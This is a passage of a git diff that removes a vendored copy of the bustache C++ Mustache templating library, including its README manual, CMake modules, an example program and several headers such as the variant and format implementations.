-* Partials
-* Set Delimiter
-* Lambdas
-* HTML escaping *(configurable)*
-* Template inheritance *(extension)*
-
-## Basics
-{{ mustache }} is a template language for text-replacing.
-When it comes to formatting, there are 2 essential things -- _Format_ and _Data_.
-{{ mustache }} also allows an extra lookup-context for _Partials_.
-In {{ bustache }}, we represent the _Format_ as a `bustache::format` object, and `bustache::object` for _Data_, and anything that provides interface that is compatible with `Map<std::string, bustache::format>` can be used for _Partials_.
-The _Format_ is orthogonal to the _Data_, so techincally you can use your custom _Data_ type with `bustache::format`, but then you have to write the formatting logic yourself.
-
-### Quick Example
-```c++
-bustache::format format{"{{mustache}} templating"};
-bustache::object data{{"mustache", "bustache"}};
-std::cout << format(data); // should print "bustache templating"
-```
-
-## Manual
-
-### Data Model
-It's basically the JSON Data Model represented in C++, with some extensions.
-
-#### Header
-`#include <bustache/model.hpp>`
-
-#### Synopsis
-```c++
-using array = std::vector<value>;
-using object = boost::unordered_map<std::string, value>;
-using lambda0v = std::function<value()>;
-using lambda0f = std::function<format()>;
-using lambda1v = std::function<value(ast::content_list const&)>;
-using lambda1f = std::function<format(ast::content_list const&)>;
-
-class value =
-    variant
-    <
-        std::nullptr_t
-      , bool
-      , int
-      , double
-      , std::string
-      , array
-      , lambda0v
-      , lambda0f
-      , lambda1v
-      , lambda1f
-      , object
-    >;
-```
-### Format Object
-`bustache::format` parses in-memory string into AST.
-
-#### Header
-`#include <bustache/format.hpp>`
-
-#### Synopsis
-*Constructors*
-```c++
-format(char const* begin, char const* end); // [1]
-
-template<std::size_t N>
-explicit format(char const (&source)[N]); // [2]
-
-template<class Source>
-explicit format(Source const& source); // [3]
-
-template <typename Source>
-explicit format(Source const&& source); // [4]
-
-explicit format(ast::content_list contents, bool copytext = true); // [5]
-```
-* `Source` is an object that represents continous memory, like `std::string`, `std::vector<char>` or `boost::iostreams::mapped_file_source` that provides access to raw memory through `source.data()` and `source.size()`.
-* Version 2 allows implicit conversion from literal.
-* Version 1~3 doesn't hold the text, you must ensure the memory referenced is valid and not modified at the use of the format object.
-* Version 4 copies the necessary text into its internal buffer, so there's no lifetime issue.
-* Version 5 takes a `ast::content_list`, if `copytext == true` the text will be copied into the internal buffer.
-
-*Manipulator*
-```c++
-template <typename T>
-manipulator<T, no_context>
-operator()(T const& data, option_type flag = normal) const;
-
-template <typename T, typename Context>
-manipulator<T, Context>
-operator()(T const& data, Context const& context, option_type flag = normal) const;
-```
-* `Context` is any associative container `Map<std::string, bustache::format>`, which is referenced by _Partials_.
-* `option_type` provides 2 options: `normal` and `escape_html`, if `normal` is chosen, there's no difference between `{{Tag}}` and `{{{Tag}}}`, the text won't be escaped in both cases.
-
-### Stream-based Output
-Output directly to the `std::basic_ostream`.
-
-#### Synopsis
-```c++
-// in <bustache/model.hpp>
-template<class CharT, class Traits, class T, class Context,
-    std::enable_if_t<std::is_constructible<value::view, T>::value, bool> = true>
-inline std::basic_ostream<CharT, Traits>&
-operator<<(std::basic_ostream<CharT, Traits>& out, manipulator<T, Context> const& manip)
-```
-
-#### Example
-```c++
-// open the template file
-boost::iostreams::mapped_file_source file(...);
-// create format from source
-bustache::format format(file);
-// create the data we want to output
-bustache::object data{...};
-// create the context for Partials
-std::unordered_map<std::string, bustache::format> context{...};
-// output the result
-std::cout << format(data, context, bustache::escape_html);
-```
-Note that you can output anything that constitutes `bustache::value`, not just `bustache::object`.
-
-### String Output
-Generate a `std::string` from a `manipulator`.
-
-#### Synopsis
-```c++
-// in <bustache/model.hpp>
-template<class T, class Context,
-    std::enable_if_t<std::is_constructible<value::view, T>::value, bool> = true>
-inline std::string to_string(manipulator<T, Context> const& manip)
-```
-#### Example
-```c++
-bustache::format format(...);
-std::string txt = to_string(format(data, context, bustache::escape_html));
-```
-
-### Generate API
-`generate` can be used for customized output.
-
-#### Header
-`#include <bustache/generate.hpp>`
-
-```c++
-template<class Sink>
-inline void generate
-(
-    Sink& sink, format const& fmt, value::view const& data,
-    option_type flag = normal
-);
-
-template<class Sink, class Context>
-void generate
-(
-    Sink& sink, format const& fmt, value::view const& data,
-    Context const& context, option_type flag = normal
-);
-```
-`Sink` is a polymorphic functor that handles:
-```c++
-void operator()(char const* it, char const* end);
-void operator()(bool data);
-void operator()(int data);
-void operator()(double data);
-```
-You don't have to deal with HTML-escaping yourself, it's handled within `generate` depending on the option.
-
-### Predefined Generators
-These are predefined output built on `generate`.
-
-#### Header
-* `#include <bustache/generate/ostream.hpp>`
-* `#include <bustache/generate/string.hpp>`
-
-```c++
-template<class CharT, class Traits, class Context>
-void generate_ostream
-(
-    std::basic_ostream<CharT, Traits>& out, format const& fmt,
-    value::view const& data, Context const& context, option_type flag
-);
-
-template<class String, class Context>
-void generate_string
-(
-    String& out, format const& fmt,
-    value::view const& data, Context const& context, option_type flag
-);
-```
-
-#### Note
-The stream-based output and string output are built on these functions,
-but `<bustache/model.hpp>` doesn't include these headers and only supports `char` output,
-if you need other char-type support for stream/string output, you have to include these headers as well.
-
-
-## Advanced Topics
-### Lambdas
-The lambdas in {{ bustache }} have 4 variants - they're production of 2 param-set x 2 return-type.
-One param-set accepts no params, the other accepts a `bustache::ast::content_list const&`.
-One return-type is `bustache::value`, the other is `bustache::format`.
-
-Note that unlike other implementations, we pass a `bustache::ast::content_list` instead of a raw string.
-A `content_list` is a parsed list of AST nodes, you can make a new `content_list` out of the old one and give it to a `bustache::format`.
-
-### Error Handling
-The constructor of `bustache::format` may throw `bustache::format_error` if the parsing fails.
-```
-class format_error : public std::runtime_error
-{
-public:
-    explicit format_error(error_type err);
-
-    error_type code() const;
-};
-```
-`error_type` has these values:
-* error_set_delim
-* error_baddelim
-* error_delim
-* error_section
-* error_badkey
-
-You can also use `what()` for a descriptive text.
-
-## Performance
-Compare with 2 other libs - [mstch](https://github.com/no1msd/mstch) and [Kainjow.Mustache](https://github.com/kainjow/Mustache).
-See [benchmark.cpp](test/benchmark.cpp). 
-
-Sample run (VS2015 Update 3, boost 1.60.0, 64-bit release build):
-```
-Benchmark               Time           CPU Iterations
------------------------------------------------------
-bustache_usage       6325 ns       6397 ns     112179
-mstch_usage        140822 ns     140795 ns       4986
-kainjow_usage       47354 ns      47420 ns      14475
-```
-Lower is better.
-
-![benchmark](doc/benchmark.png?raw=true)
-
-## License
-
-    Copyright (c) 2014-2017 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-
-<!-- Links -->
-[badge.Wandbox]: https://img.shields.io/badge/try%20it-online-green.svg
diff --git a/thirdparty/bustache/cmake/FindCatch.cmake b/thirdparty/bustache/cmake/FindCatch.cmake
deleted file mode 100644
index f5c2e7d..0000000
--- a/thirdparty/bustache/cmake/FindCatch.cmake
+++ /dev/null
@@ -1,13 +0,0 @@
-find_path(
-	CATCH_INCLUDE_DIR 
-	NAMES catch.hpp
-)
-
-set(CATCH_INCLUDE_DIRS ${CATCH_INCLUDE_DIR})
-
-include(FindPackageHandleStandardArgs)
-
-find_package_handle_standard_args(Catch DEFAULT_MSG
-	CATCH_INCLUDE_DIR)
-
-mark_as_advanced (CATCH_INCLUDE_DIR)
\ No newline at end of file
diff --git a/thirdparty/bustache/cmake/Modules/FindCatch.cmake b/thirdparty/bustache/cmake/Modules/FindCatch.cmake
deleted file mode 100644
index e596841..0000000
--- a/thirdparty/bustache/cmake/Modules/FindCatch.cmake
+++ /dev/null
@@ -1,14 +0,0 @@
-find_path(
-	CATCH_INCLUDE_DIR 
-	NAMES catch.hpp
-	DOC "catch include dir"
-)
-
-set(CATCH_INCLUDE_DIRS ${CATCH_INCLUDE_DIR})
-
-include(FindPackageHandleStandardArgs)
-
-find_package_handle_standard_args(Catch DEFAULT_MSG
-	CATCH_INCLUDE_DIR)
-
-mark_as_advanced (CATCH_INCLUDE_DIR)
\ No newline at end of file
diff --git a/thirdparty/bustache/doc/benchmark.png b/thirdparty/bustache/doc/benchmark.png
deleted file mode 100644
index e69de29..0000000
--- a/thirdparty/bustache/doc/benchmark.png
+++ /dev/null
diff --git a/thirdparty/bustache/example/in.mustache b/thirdparty/bustache/example/in.mustache
deleted file mode 100644
index 996db4f..0000000
--- a/thirdparty/bustache/example/in.mustache
+++ /dev/null
@@ -1,39 +0,0 @@
-<h1>{{header}}</h1>
-{{#bug}}
-{{/bug}}
-
-{{# items}}
-  {{#first}}
-    <li><strong>{{name}}</strong></li>
-  {{/first}}
-  {{#link}}
-    <li><a {{>href}}>{{name}}</a></li>
-  {{/link}}
-{{ /items}}
-
-{{#empty}}
-  <p>The list is empty.</p>
-{{/ empty }}
-
-{{=[ ]=}}
-
-[#array]([.])[/array]
-
-[#items]
-[count]->[count]->[count]
-[/items]
-
-[a.b.c] == [#a][#b][c][/b][/a]
-
-<div class="comments">
-    <h3>[header]</h3>
-    <ul>
-        [#comments]
-        <li class="comment">
-            <h5>[name]</h5>
-            <p>[body]</p>
-        </li>
-        <!--[count]-->
-        [/comments]
-    </ul>
-</div>
\ No newline at end of file
diff --git a/thirdparty/bustache/example/main.cpp b/thirdparty/bustache/example/main.cpp
deleted file mode 100644
index 4a7aea6..0000000
--- a/thirdparty/bustache/example/main.cpp
+++ /dev/null
@@ -1,82 +0,0 @@
-#include <iostream>
-#include <bustache/model.hpp>
-#include <boost/iostreams/device/mapped_file.hpp>
-
-int main()
-{
-    using bustache::object;
-    using bustache::array;
-    using namespace bustache::literals;
-
-    boost::unordered_map<std::string, bustache::format> context
-    {
-        {"href", "href=\"{{url}}\""_fmt}
-    };
-
-    int n = 0;
-    object data
-    {
-        {"header", "Colors"},
-        {"items",
-            array
-            {
-                object
-                {
-                    {"name", "red"},
-                    {"first", true},
-                    {"url", "#Red"}
-                },
-                object
-                {
-                    {"name", "green"},
-                    {"link", true},
-                    {"url", "#Green"}
-                },
-                object
-                {
-                    {"name", "blue"},
-                    {"link", true},
-                    {"url", "#Blue"}
-                }
-            }
-        },
-        {"empty", false},
-        {"count", [&n] { return ++n; }},
-        {"array", array{1, 2, 3}},
-        {"a", object{{"b", object{{"c", true}}}}},
-        {"comments",
-            array
-            {
-                object
-                {
-                    {"name", "Joe"},
-                    {"body", "<html> should be escaped"}
-                },
-                object
-                {
-                    {"name", "Sam"},
-                    {"body", "{{mustache}} can be seen"}
-                },
-                object
-                {
-                    {"name", "New"},
-                    {"body", "break\nup"}
-                }
-            }
-        }
-    };
-
-    try
-    {
-        boost::iostreams::mapped_file_source file("in.mustache");
-        bustache::format format(file);
-        std::cout << "-----------------------\n";
-        std::cout << format(data, context, bustache::escape_html) << "\n";
-        std::cout << "-----------------------\n";
-    }
-    catch (const std::exception& e)
-    {
-        std::cerr << e.what();
-    }
-    return 0;
-}
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/ast.hpp b/thirdparty/bustache/include/bustache/ast.hpp
deleted file mode 100644
index 94e142e..0000000
--- a/thirdparty/bustache/include/bustache/ast.hpp
+++ /dev/null
@@ -1,86 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2014-2017 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_AST_HPP_INCLUDED
-#define BUSTACHE_AST_HPP_INCLUDED
-
-#include <bustache/detail/variant.hpp>
-#include <boost/utility/string_ref.hpp>
-#include <boost/unordered_map.hpp>
-#include <vector>
-#include <string>
-
-namespace bustache { namespace ast
-{
-    struct variable;
-    struct section;
-    class content;
-
-    using text = boost::string_ref;
-
-    using content_list = std::vector<content>;
-
-    using override_map = boost::unordered_map<std::string, content_list>;
-
-    struct null {};
-
-    struct variable
-    {
-        std::string key;
-        char tag = '\0';
-#ifdef _MSC_VER // Workaround MSVC bug.
-        variable() = default;
-
-        explicit variable(std::string key, char tag = '\0')
-          : key(std::move(key)), tag(tag)
-        {}
-#endif
-    };
-
-    struct block
-    {
-        std::string key;
-        content_list contents;
-    };
-
-    struct section : block
-    {
-        char tag = '#';
-    };
-
-    struct partial
-    {
-        std::string key;
-        std::string indent;
-        override_map overriders;
-    };
-
-#define BUSTACHE_AST_CONTENT(X, D)                                              \
-    X(0, null, D)                                                               \
-    X(1, text, D)                                                               \
-    X(2, variable, D)                                                           \
-    X(3, section, D)                                                            \
-    X(4, partial, D)                                                            \
-    X(5, block, D)                                                              \
-/***/
-
-    class content : public variant_base<content>
-    {
-        BUSTACHE_AST_CONTENT(Zz_BUSTACHE_VARIANT_MATCH,)
-    public:
-        Zz_BUSTACHE_VARIANT_DECL(content, BUSTACHE_AST_CONTENT, true)
-
-        content() noexcept : _which(0), _0() {}
-    };
-#undef BUSTACHE_AST_CONTENT
-
-    inline bool is_null(content const& c)
-    {
-        return !c.which();
-    }
-}}
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/debug.hpp b/thirdparty/bustache/include/bustache/debug.hpp
deleted file mode 100644
index 1235361..0000000
--- a/thirdparty/bustache/include/bustache/debug.hpp
+++ /dev/null
@@ -1,92 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_DEBUG_HPP_INCLUDED
-#define BUSTACHE_DEBUG_HPP_INCLUDED
-
-#include <iostream>
-#include <iomanip>
-#include <bustache/format.hpp>
-
-namespace bustache { namespace detail
-{
-    template<class CharT, class Traits>
-    struct ast_printer
-    {
-        std::basic_ostream<CharT, Traits>& out;
-        unsigned level;
-        unsigned const space;
-
-        void operator()(ast::text const& text) const
-        {
-            indent();
-            auto i = text.begin();
-            auto i0 = i;
-            auto e = text.end();
-            out << "text: \"";
-            while (i != e)
-            {
-                char const* esc = nullptr;
-                switch (*i)
-                {
-                case '\r': esc = "\\r"; break;
-                case '\n': esc = "\\n"; break;
-                case '\\': esc = "\\\\"; break;
-                default: ++i; continue;
-                }
-                out.write(i0, i - i0);
-                i0 = ++i;
-                out << esc;
-            }
-            out.write(i0, i - i0);
-            out << "\"\n";
-        }
-
-        void operator()(ast::variable const& variable) const
-        {
-            indent();
-            out << "variable";
-            if (variable.tag)
-                out << "(&)";
-            out << ": " << variable.key << "\n";
-        }
-
-        void operator()(ast::section const& section)
-        {
-            out;
-            out << "section(" << section.tag << "): " << section.key << "\n";
-            ++level;
-            for (auto const& content : section.contents)
-                apply_visitor(*this, content);
-            --level;
-        }
-
-        void operator()(ast::partial const& partial) const
-        {
-            out << "partial: " << partial.key << "\n";
-        }
-
-        void operator()(ast::null) const {} // never called
-
-        void indent() const
-        {
-            out << std::setw(space * level) << "";
-        }
-    };
-}}
-
-namespace bustache
-{
-    template<class CharT, class Traits>
-    inline void print_ast(std::basic_ostream<CharT, Traits>& out, format const& fmt, unsigned indent = 4)
-    {
-        detail::ast_printer<CharT, Traits> visitor{out, 0, indent};
-        for (auto const& content : fmt.contents())
-            apply_visitor(visitor, content);
-    }
-}
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/detail/any_context.hpp b/thirdparty/bustache/include/bustache/detail/any_context.hpp
deleted file mode 100644
index 78bf207..0000000
--- a/thirdparty/bustache/include/bustache/detail/any_context.hpp
+++ /dev/null
@@ -1,55 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_DETAIL_ANY_CONTEXT_HPP_INCLUDED
-#define BUSTACHE_DETAIL_ANY_CONTEXT_HPP_INCLUDED
-
-#include <string>
-#include <utility>
-
-namespace bustache
-{
-    struct format;
-}
-
-namespace bustache { namespace detail
-{
-    struct any_context
-    {
-        using value_type = std::pair<std::string const, format>;
-        using iterator = value_type const*;
-
-        template<class Context>
-        any_context(Context const& context) noexcept
-            : _data(&context), _find(find_fn<Context>)
-        {}
-
-        iterator find(std::string const& key) const
-        {
-            return _find(_data, key);
-        }
-
-        iterator end() const
-        {
-            return nullptr;
-        }
-
-    private:
-
-        template<class Context>
-        static value_type const* find_fn(void const* data, std::string const& key)
-        {
-            auto ctx = static_cast<Context const*>(data);
-            auto it = ctx->find(key);
-            return it != ctx->end() ? &*it : nullptr;
-        }
-
-        void const* _data;
-        value_type const* (*_find)(void const*, std::string const&);
-    };
-}}
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/detail/variant.hpp b/thirdparty/bustache/include/bustache/detail/variant.hpp
deleted file mode 100644
index 50c6c66..0000000
--- a/thirdparty/bustache/include/bustache/detail/variant.hpp
+++ /dev/null
@@ -1,362 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016-2017 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_DETAIL_VARIANT_HPP_INCLUDED
-#define BUSTACHE_DETAIL_VARIANT_HPP_INCLUDED
-
-#include <cassert>
-#include <cstdlib>
-#include <utility>
-#include <stdexcept>
-#include <type_traits>
-
-namespace bustache { namespace detail
-{
-    template<class T>
-    inline T& cast(void* data)
-    {
-        return *static_cast<T*>(data);
-    }
-
-    template<class T>
-    inline T const& cast(void const* data)
-    {
-        return *static_cast<T const*>(data);
-    }
-
-    template<class T, class U>
-    struct noexcept_ctor_assign
-    {
-        static constexpr bool value =
-            std::is_nothrow_constructible<T, U>::value &&
-            std::is_nothrow_assignable<T, U>::value;
-    };
-
-    struct ctor_visitor
-    {
-        using result_type = void;
-
-        void* data;
-
-        template<class T>
-        void operator()(T& t) const
-        {
-            new(data) T(std::move(t));
-        }
-
-        template<class T>
-        void operator()(T const& t) const
-        {
-            new(data) T(t);
-        }
-    };
-
-    struct assign_visitor
-    {
-        using result_type = void;
-
-        void* data;
-
-        template<class T>
-        void operator()(T& t) const
-        {
-            *static_cast<T*>(data) = std::move(t);
-        }
-
-        template<class T>
-        void operator()(T const& t) const
-        {
-            *static_cast<T*>(data) = t;
-        }
-    };
-
-    struct dtor_visitor
-    {
-        using result_type = void;
-
-        template<class T>
-        void operator()(T& t) const
-        {
-            t.~T();
-        }
-    };
-
-    template<class T>
-    struct type {};
-}}
-
-namespace bustache
-{
-    template<class T>
-    struct variant_base {};
-
-    template<class View>
-    struct variant_ptr
-    {
-        variant_ptr() noexcept : _data() {}
-
-        variant_ptr(std::nullptr_t) noexcept : _data() {}
-
-        variant_ptr(unsigned which, void const* data) noexcept
-            : _which(which), _data(data)
-        {}
-
-        explicit operator bool() const
-        {
-            return !!_data;
-        }
-
-        View operator*() const
-        {
-            return{_which, _data};
-        }
-
-        unsigned which() const
-        {
-            return _which;
-        }
-
-        void const* data() const
-        {
-            return _data;
-        }
-
-    private:
-
-        unsigned _which;
-        void const* _data;
-    };
-
-    class bad_variant_access : public std::exception
-    {
-    public:
-        bad_variant_access() noexcept {}
-
-        const char* what() const noexcept override
-        {
-            return "bustache::bad_variant_access";
-        }
-    };
-    
-    template<class Visitor, class Var>
-    inline auto visit(Visitor&& visitor, variant_base<Var>& v) ->
-        decltype(Var::switcher::common_ret((void*)nullptr, visitor))
-    {
-        auto& var = static_cast<Var&>(v);
-        return Var::switcher::visit(var.which(), var.data(), visitor);
-    }
-
-    template<class Visitor, class Var>
-    inline auto visit(Visitor&& visitor, variant_base<Var> const& v) ->
-        decltype(Var::switcher::common_ret((void const*)nullptr, visitor))
-    {
-        auto& var = static_cast<Var const&>(v);
-        return Var::switcher::visit(var.which(), var.data(), visitor);
-    }
-
-    // Synomym of visit (for Boost.Variant compatibility)
-    template<class Visitor, class Var>
-    inline auto apply_visitor(Visitor&& visitor, variant_base<Var>& v) ->
-        decltype(Var::switcher::common_ret((void*)nullptr, visitor))
-    {
-        return visit(std::forward<Visitor>(visitor), v);
-    }
-
-    template<class Visitor, class Var>
-    inline auto apply_visitor(Visitor&& visitor, variant_base<Var> const& v) ->
-        decltype(Var::switcher::common_ret((void const*)nullptr, visitor))
-    {
-        return visit(std::forward<Visitor>(visitor), v);
-    }
-
-    template<class T, class Var>
-    inline T& get(variant_base<Var>& v)
-    {
-        auto& var = static_cast<Var&>(v);
-        if (Var::switcher::index(detail::type<T>{}) == var.which())
-            return *static_cast<T*>(var.data());
-        throw bad_variant_access();
-    }
-
-    template<class T, class Var>
-    inline T const& get(variant_base<Var> const& v)
-    {
-        auto& var = static_cast<Var const&>(v);
-        if (Var::switcher::index(detail::type<T>{}) == var.which())
-            return *static_cast<T const*>(var.data());
-        throw bad_variant_access();
-    }
-
-    template<class T, class Var>
-    inline T* get(variant_base<Var>* vp)
-    {
-        if (vp)
-        {
-            auto v = static_cast<Var*>(vp);
-            if (Var::switcher::index(detail::type<T>{}) == v->which())
-                return static_cast<T*>(v->data());
-        }
-        return nullptr;
-    }
-
-    template<class T, class Var>
-    inline T const* get(variant_base<Var> const* vp)
-    {
-        if (vp)
-        {
-            auto v = static_cast<Var const*>(vp);
-            if (Var::switcher::index(detail::type<T>{}) == v->which())
-                return static_cast<T const*>(v->data());
-        }
-        return nullptr;
-    }
-
-    template<class T, class Var>
-    inline T const* get(variant_ptr<Var> const& vp)
-    {
-        if (vp)
-        {
-            if (Var::switcher::index(detail::type<T>{}) == vp.which())
-                return static_cast<T const*>(vp.data());
-        }
-        return nullptr;
-    }
-}
-
-#define Zz_BUSTACHE_UNREACHABLE(MSG) { assert(!MSG); std::abort(); }
-#define Zz_BUSTACHE_VARIANT_SWITCH(N, U, D) case N: return v(detail::cast<U>(data));
-#define Zz_BUSTACHE_VARIANT_RET(N, U, D) true ? v(detail::cast<U>(data)) :
-#define Zz_BUSTACHE_VARIANT_MEMBER(N, U, D) U _##N;
-#define Zz_BUSTACHE_VARIANT_CTOR(N, U, D)                                       \
-D(U val) noexcept : _which(N), _##N(std::move(val)) {}
-/***/
-#define Zz_BUSTACHE_VARIANT_INDEX(N, U, D)                                      \
-static constexpr unsigned index(detail::type<U>) { return N; }                  \
-/***/
-#define Zz_BUSTACHE_VARIANT_MATCH(N, U, D) static U match_type(U);
-#define Zz_BUSTACHE_VARIANT_DECL(VAR, TYPES, NOEXCPET)                          \
-struct switcher                                                                 \
-{                                                                               \
-    template<class T, class Visitor>                                            \
-    static auto common_ret(T* data, Visitor& v) ->                              \
-        decltype(TYPES(Zz_BUSTACHE_VARIANT_RET,) throw bad_variant_access());   \
-    template<class T, class Visitor>                                            \
-    static auto visit(unsigned which, T* data, Visitor& v) ->                   \
-        decltype(common_ret(data, v))                                           \
-    {                                                                           \
-        switch (which)                                                          \
-        {                                                                       \
-        TYPES(Zz_BUSTACHE_VARIANT_SWITCH,)                                      \
-        default: throw bad_variant_access();                                    \
-        }                                                                       \
-    }                                                                           \
-    TYPES(Zz_BUSTACHE_VARIANT_INDEX,)                                           \
-};                                                                              \
-private:                                                                        \
-unsigned _which;                                                                \
-union                                                                           \
-{                                                                               \
-    char _storage[1];                                                           \
-    TYPES(Zz_BUSTACHE_VARIANT_MEMBER,)                                          \
-};                                                                              \
-void invalidate()                                                               \
-{                                                                               \
-    if (valid())                                                                \
-    {                                                                           \
-        detail::dtor_visitor v;                                                 \
-        switcher::visit(_which, data(), v);                                     \
-        _which = ~0u;                                                           \
-    }                                                                           \
-}                                                                               \
-template<class T>                                                               \
-void do_init(T& other)                                                          \
-{                                                                               \
-    detail::ctor_visitor v{_storage};                                           \
-    switcher::visit(other._which, other.data(), v);                             \
-}                                                                               \
-template<class T>                                                               \
-void do_assign(T& other)                                                        \
-{                                                                               \
-    if (_which == other._which)                                                 \
-    {                                                                           \
-        detail::assign_visitor v{_storage};                                     \
-        switcher::visit(other._which, other.data(), v);                         \
-    }                                                                           \
-    else                                                                        \
-    {                                                                           \
-        invalidate();                                                           \
-        if (other.valid())                                                      \
-        {                                                                       \
-            do_init(other);                                                     \
-            _which = other._which;                                              \
-        }                                                                       \
-    }                                                                           \
-}                                                                               \
-public:                                                                         \
-unsigned which() const                                                          \
-{                                                                               \
-    return _which;                                                              \
-}                                                                               \
-bool valid() const                                                              \
-{                                                                               \
-    return _which != ~0u;                                                       \
-}                                                                               \
-void* data()                                                                    \
-{                                                                               \
-    return _storage;                                                            \
-}                                                                               \
-void const* data() const                                                        \
-{                                                                               \
-    return _storage;                                                            \
-}                                                                               \
-VAR(VAR&& other) noexcept(NOEXCPET) : _which(other._which)                      \
-{                                                                               \
-    do_init(other);                                                             \
-}                                                                               \
-VAR(VAR const& other) : _which(other._which)                                    \
-{                                                                               \
-    do_init(other);                                                             \
-}                                                                               \
-template<class T, class U = decltype(match_type(std::declval<T>()))>            \
-VAR(T&& other) noexcept(std::is_nothrow_constructible<U, T>::value)             \
-  : _which(switcher::index(detail::type<U>{}))                                  \
-{                                                                               \
-    new(_storage) U(std::forward<T>(other));                                    \
-}                                                                               \
-~VAR()                                                                          \
-{                                                                               \
-    if (valid())                                                                \
-    {                                                                           \
-        detail::dtor_visitor v;                                                 \
-        switcher::visit(_which, data(), v);                                     \
-    }                                                                           \
-}                                                                               \
-template<class T, class U = decltype(match_type(std::declval<T>()))>            \
-U& operator=(T&& other) noexcept(detail::noexcept_ctor_assign<U, T>::value)     \
-{                                                                               \
-    if (switcher::index(detail::type<U>{}) == _which)                           \
-        return *static_cast<U*>(data()) = std::forward<T>(other);               \
-    else                                                                        \
-    {                                                                           \
-        invalidate();                                                           \
-        auto p = new(_storage) U(std::forward<T>(other));                       \
-        _which = switcher::index(detail::type<U>{});                            \
-        return *p;                                                              \
-    }                                                                           \
-}                                                                               \
-VAR& operator=(VAR&& other) noexcept(NOEXCPET)                                  \
-{                                                                               \
-    do_assign(other);                                                           \
-    return *this;                                                               \
-}                                                                               \
-VAR& operator=(VAR const& other)                                                \
-{                                                                               \
-    do_assign(other);                                                           \
-    return *this;                                                               \
-}                                                                               \
-/***/
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/format.hpp b/thirdparty/bustache/include/bustache/format.hpp
deleted file mode 100644
index dd07740..0000000
--- a/thirdparty/bustache/include/bustache/format.hpp
+++ /dev/null
@@ -1,158 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2014-2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_FORMAT_HPP_INCLUDED
-#define BUSTACHE_FORMAT_HPP_INCLUDED
-
-#include <bustache/ast.hpp>
-#include <stdexcept>
-#include <memory>
-
-namespace bustache
-{
-    struct format;
-    
-    using option_type = bool;
-    constexpr option_type normal = false;
-    constexpr option_type escape_html = true;
-
-    template<class T, class Context>
-    struct manipulator
-    {
-        format const& fmt;
-        T const& data;
-        Context const& context;
-        option_type const flag;
-    };
-
-    struct no_context
-    {
-        using value_type = std::pair<std::string const, format>;
-        using iterator = value_type const*;
-        
-        constexpr iterator find(std::string const&) const
-        {
-            return nullptr;
-        }
-        
-        constexpr iterator end() const
-        {
-            return nullptr;
-        }
-
-        static no_context const& dummy()
-        {
-            static no_context const _{};
-            return _;
-        }
-    };
-
-    enum error_type
-    {
-        error_set_delim,
-        error_baddelim,
-        error_delim,
-        error_section,
-        error_badkey
-    };
-
-    class format_error : public std::runtime_error
-    {
-        error_type _err;
-
-    public:
-        explicit format_error(error_type err);
-
-        error_type code() const
-        {
-            return _err;
-        }
-    };
-    
-    struct format
-    {
-        format() = default;
-
-        format(char const* begin, char const* end)
-        {
-            init(begin, end);
-        }
-        
-        template<class Source>
-        explicit format(Source const& source)
-        {
-            init(source.data(), source.data() + source.size());
-        }
-        
-        template<class Source>
-        explicit format(Source const&& source)
-        {
-            init(source.data(), source.data() + source.size());
-            copy_text(text_size());
-        }
-
-        template<std::size_t N>
-        explicit format(char const (&source)[N])
-        {
-            init(source, source + (N - 1));
-        }
-
-        explicit format(ast::content_list contents, bool copytext = true)
-          : _contents(std::move(contents))
-        {
-            if (copytext)
-                copy_text(text_size());
-        }
-
-        format(format&& other) noexcept
-          : _contents(std::move(other._contents)), _text(std::move(other._text))
-        {}
-
-        format(format const& other) : _contents(other._contents)
-        {
-            if (other._text)
-                copy_text(text_size());
-        }
-
-        template<class T>
-        manipulator<T, no_context>
-        operator()(T const& data, option_type flag = normal) const
-        {
-            return {*this, data, no_context::dummy(), flag};
-        }
-        
-        template<class T, class Context>
-        manipulator<T, Context>
-        operator()(T const& data, Context const& context, option_type flag = normal) const
-        {
-            return {*this, data, context, flag};
-        }
-        
-        ast::content_list const& contents() const
-        {
-            return _contents;
-        }
-        
-    private:
-        
-        void init(char const* begin, char const* end);
-        std::size_t text_size() const;
-        void copy_text(std::size_t n);
-
-        ast::content_list _contents;
-        std::unique_ptr<char[]> _text;
-    };
-
-    inline namespace literals
-    {
-        inline format operator"" _fmt(char const* str, std::size_t n)
-        {
-            return format(str, str + n);
-        }
-    }
-}
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/generate.hpp b/thirdparty/bustache/include/bustache/generate.hpp
deleted file mode 100644
index 65a6491..0000000
--- a/thirdparty/bustache/include/bustache/generate.hpp
+++ /dev/null
@@ -1,430 +0,0 @@
